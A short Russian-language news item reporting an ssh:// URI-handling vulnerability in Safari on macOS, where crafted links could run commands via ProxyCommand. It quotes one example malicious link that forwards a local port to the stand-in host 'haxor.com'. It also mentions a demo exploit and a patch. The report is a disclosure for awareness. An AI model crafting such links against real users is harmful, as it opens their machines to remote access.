В дополнение к предыдущим URI-уязвимостям в MacOS появилась ещё одна. На сей раз на сайте insecure.ws опубликовано сообщение о существовании уязвиимости в обработке URI в браузере Safari. При задании в поле URI ссылки на ssh могут выполняться произвольные команды (с выставленной опцией ProxyCommand). Также можно использовать в формируемом URI опцию проброса портов -R, для чего необходимо софрмировать следующую ссылку - ssh://ssh haxor.com -R port:localhost:port. Как пишет сам автор, вполне возможно, что уязвимость существует и в других браузерах - Camino,Firefox,Mozilla, однако ему её не удалось воспроизвести на них (возможно, из-за багов в обработке переключателей на использующемся Gnome 2.6.1. Также возможно существование уязвимости в других ОС, однако подтвердить это не удалось. Проверена только защита браузера konqueror (не сработало). На странице с описанием приводится ссылка на демо-страницу с эксплоитом. Кроме того, существует частный патч для латания уязвимости, ссылка на который приведена ниже.
Описание
Патч